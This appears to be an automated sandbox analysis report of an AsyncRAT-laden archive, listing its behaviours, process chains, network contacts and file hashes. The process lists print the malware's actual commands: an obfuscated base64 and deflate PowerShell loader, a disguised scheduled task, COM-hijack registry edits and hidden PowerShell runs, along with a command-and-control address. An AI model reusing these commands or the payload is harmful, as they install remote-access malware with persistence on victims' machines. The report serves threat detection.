Analysis Overview
SHA256
32f1242ed665427ddd6aeee0ec04728589ad386fcc95a9ceece3a1cee558f9a3
Threat Level: Known bad
The file 17092024_0454_16092024_AG#976832.rar was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Event Triggered Execution: Component Object Model Hijacking
Obfuscated with Agile.Net obfuscator
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-17 04:54
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-17 04:54
Reported
2024-09-17 04:59
Platform
win7-20240704-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2956 wrote to memory of 2276 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2956 wrote to memory of 2276 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2956 wrote to memory of 2276 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2276 wrote to memory of 2328 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2276 wrote to memory of 2328 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2276 wrote to memory of 2328 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AG#976832.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $udvqhnorgmakexczpfbs = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('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'));powershell $udvqhnorgmakexczpfbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&( $Env:COMsPeC[4,15,25]-JOin'')( NEW-obJECt Io.STrEAmReadER( (NEW-obJECt io.cOMPReSSioN.DefLateStREaM([Io.mEMorystREaM] [ConVerT]::FrOmBASE64sTriNG('rVlZbuMwDL2K4RGmMQRkDlAY7T0CA7lH4LuPqM0U9UgpRT/ShaJI6omr4l5/zmXZl8Uvi7ttn+Hn6/7Yz92FhU/38ieteRfZ4uqe+G9E2olAK544t8yxcQ62vixJ/r/jce7XKmmm3UHb8/lBe29pk9wbfh8nVh2Ws3IXBZTFpOAS8Lh7ti5Xn89tP6v29mxR+LGR3vWx+tUFGd+vZUmq10fSfAT2sPT9OrfARRvXcLw1i14rw7V3fcT1sBjoEfrMReQvkuvPuOlY8wmD3et6v0U1RQZXRfCSDF84ig5P5MQTgCwsZAqxJOVHXKcD5HOVC0uGf6WjZpPK5sJHF3/QRVQExVGjEczCrIujSGsXAEFO3LWfhG9CJoDwt9zNLTPFv+L9JA30IWfyjEbHKx7gG+604gF3S6PPfl57N/E/2d7rrbaIfdwKWk86o7+ZXNGVODmbUZm2bHlloDNLWfyMl86LukMqSYIoMRuj+vjLd3cS/A6JTXEvQevBJ24JdyvyUKVlKnYTDRZATydrT5udasrZJORZxAZumqPdU2w1LYBZiYNWtm534cLO2V0VulmEVgpn3zhi1iddxkG5JKBzDKyLB16VqaKV6a6gOjaH3z/OH8I1+3guscuU4zuRMNthBUEaJKGLD4f/IHhr8Mk0Q6Rpr8EmuTn3UJz/kHYpzq8lBeZMGH55n11Galj6tFviouXiPtHFnu98uYsDVnwqrTq3KYql9gl8R2VpMr1qKXOO6hvIWgAvINT7Vgrnx4nqO0/V9aAWHluNlc6z24xeUpQZz9KI5N+DK5GdCWgKfpZ7tBRtl5+JDARcpA8BnIFkfbEykOkPLDz65PFW7rGqENarlrAOdnBud8oGAndMLY6DGoacEebikX+o2lCnjCxoD/F+w9Tej15dppOUvPe2DTTbveZMMz4GYZXTCeo3EK3vduy7V5xP7ddnEMnaDBec9yttCOIoz0x7SjUVmQQiok0McDQQR5ouwlq+GI1ISgjKmlL6Fmv4TDwxGahlph6xKVbj8aSdOSaSmIZWX05mJh/RwW7It+XgitpuPavxaL84NwG4MtnLe9J7x1rm5Ygxqoeov21OOVG0tX66v2r8wiBKdxeBPx0vuuIO3WMYi1pp/52hQivwsnS90ZiM6QlR1L5p9UCdfGVthpXZpGmOioqnWjxmfRWHvxpeIMEN3zpgWTGJ2vgkB5AWt2S0E3GD/RJmV7W+NtmgFP6O1GTGwevf9CBqPL1MvxzptV+rJzin4ecx2OVPjAhdWnsHMvgCVR3ATmooM5n48eRpOdXg0U1nEulAedy1y6ZdA1ihsUJYa4d0jpIjrUE9DWWqnwlJb7z9W8kJxgfoQPVRRWseB9ECXhiUQQ0Qe8tnAVZenbBHK+9lo/HITwe3VmiVL24KO331Fb8AW5b/'), [Io.COmpRession.cOMPrESSIonmOde]::DEcOMPrEss)) , [sYSTEm.tEXt.ENCodIng]::ascIi) ).READtOEnD()"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | www1.coulmandental.com | udp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
Files
memory/2276-4-0x000007FEF554E000-0x000007FEF554F000-memory.dmp
memory/2276-5-0x000000001B780000-0x000000001BA62000-memory.dmp
memory/2276-10-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp
memory/2276-9-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp
memory/2276-8-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp
memory/2276-7-0x0000000001D20000-0x0000000001D28000-memory.dmp
memory/2276-6-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp
memory/2276-11-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | c276a833630cfdd812189011810d59c3 |
| SHA1 | 3743da8d538c706f2f3ecda52d00b55a8ba7d7c9 |
| SHA256 | f4e4d3619b5c87726482f5afdc8d061272cc11ddf257da17232b7aa2e9d41b60 |
| SHA512 | 2d87bec542d38b88a103e1d94d1a9247647577ad7c0d0c256ad5bfdf09dec9bcfe961a51bc0a14da35a74f965c83a1efe2fc55e545b270c7c648bd9241db2207 |
memory/2276-17-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp
memory/2276-18-0x000007FEF554E000-0x000007FEF554F000-memory.dmp
memory/2276-19-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-17 04:54
Reported
2024-09-17 05:00
Platform
win10v2004-20240802-en
Max time kernel
249s
Max time network
304s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AG#976832.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&( $Env:COMsPeC[4,15,25]-JOin'')( NEW-obJECt Io.STrEAmReadER( (NEW-obJECt io.cOMPReSSioN.DefLateStREaM([Io.mEMorystREaM] [ConVerT]::FrOmBASE64sTriNG('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'), [Io.COmpRession.cOMPrESSIonmOde]::DEcOMPrEss)) , [sYSTEm.tEXt.ENCodIng]::ascIi) ).READtOEnD()"
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f
C:\Windows\system32\cmd.exe
cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f
C:\Windows\system32\cmd.exe
cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www1.coulmandental.com | udp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.83.192.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 88.119.175.153:8808 | | tcp |
| US | 8.8.8.8:53 | 153.175.119.88.in-addr.arpa | udp |
Files
memory/2096-0-0x00007FFF67963000-0x00007FFF67965000-memory.dmp
memory/2096-1-0x0000017A5FB30000-0x0000017A5FB52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wkwdduoj.l4u.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2096-11-0x00007FFF67960000-0x00007FFF68421000-memory.dmp
memory/2096-12-0x00007FFF67960000-0x00007FFF68421000-memory.dmp
memory/2096-22-0x00007FFF67963000-0x00007FFF67965000-memory.dmp
memory/2096-23-0x00007FFF67960000-0x00007FFF68421000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a6c9d692ed2826ecb12c09356e69cc09 |
| SHA1 | def728a6138cf083d8a7c61337f3c9dade41a37f |
| SHA256 | a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b |
| SHA512 | 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8d089c855358969266a3275f0ec4f955 |
| SHA1 | 5ce30b598cfa0c2008541b1b549673401971dc3d |
| SHA256 | e198883dc78657f44bae11e2de5f56bc0f41eb6440f73cd3d65c30878b858734 |
| SHA512 | f240dcfc7adcca3140cdc2f8f387ac2053a7fd6e5e474a4008cf38d03506f99e361a5d6e970480ab1155ad00531b9d9095ed2a502ad09e7e442cdf7bcf932320 |
memory/2096-32-0x00007FFF67960000-0x00007FFF68421000-memory.dmp
C:\ProgramData\Cloud\cloud.vbs
| MD5 | 7079642a22a106d0ed6f227cc70899ae |
| SHA1 | 60dd57af3518c0ea4104379ad233b5982b231283 |
| SHA256 | b098e1055dc3dd3156236ee515e5dfbefd746d84578197f2309968625b831724 |
| SHA512 | ca1e9e201785fa611520ee2585208fb0684fd338ff1ab1d515523e03677ac4ac1ca5353fdc17bcba4c6c39aa37f9be182c5f7187b8dd9520c8604a001bd69f80 |
C:\ProgramData\Cloud\cloud.bat
| MD5 | b8bdfc7895feaaacba3711d17be6778a |
| SHA1 | fa0bc12827b348fe540a13683897deb207650df7 |
| SHA256 | e209153dda335fec8fa021f1022c4f9fe041cb527c2b9068eb9ec911429f20a3 |
| SHA512 | ea91a8262eacba0bcd6f692b5141124d7fedc98507ad6ab71ade565b347fe328780221f6972cc5c98a9471662474bf8c93e1219d241ff5f90579f7f8e8dd5156 |
C:\ProgramData\Cloud\cloud.ps1
| MD5 | d93d9d8d63201a2e547d4e1dde62d6d7 |
| SHA1 | 5a2273543ad08d5f749c9c7ee60e0b703548b8e7 |
| SHA256 | f5811cd347fc2f2d538625c468ae7ecbd8d0c18db495b9d3701204f7a13a527e |
| SHA512 | 59de80b3ce3e5406a8e1f2544fabb50a7d95b037143652fc0084b8bfe864337e0d4ab3cd14ef3c8249944bdccf9e27dce3471d955fac278ff45a68d32320e699 |
memory/4324-46-0x000001E949270000-0x000001E94927E000-memory.dmp
memory/1148-47-0x0000000000C00000-0x0000000000C18000-memory.dmp
memory/1148-49-0x0000000005340000-0x0000000005356000-memory.dmp
memory/1148-50-0x0000000005C30000-0x00000000061D4000-memory.dmp
memory/1148-51-0x0000000005860000-0x00000000058F2000-memory.dmp
memory/1148-52-0x0000000005840000-0x000000000584A000-memory.dmp
memory/1148-53-0x0000000006420000-0x00000000064BC000-memory.dmp
memory/1148-54-0x00000000064C0000-0x0000000006526000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6a231d98910d30502b367311f00984ae |
| SHA1 | 880e79decf402444db13eba21fc8d72d6ca53cda |
| SHA256 | c46efe7d37e93f1efb6551392e296ea0b9e9fc4d021d58751057443327e275f9 |
| SHA512 | 0cefc49d3da428387feb558a3e098e083a5425b6108d7601a5c6601cbdc1feaf20acfa54bcb866ef343df53ac46beb9dce38177717785e7f5dbb5ceabd33a501 |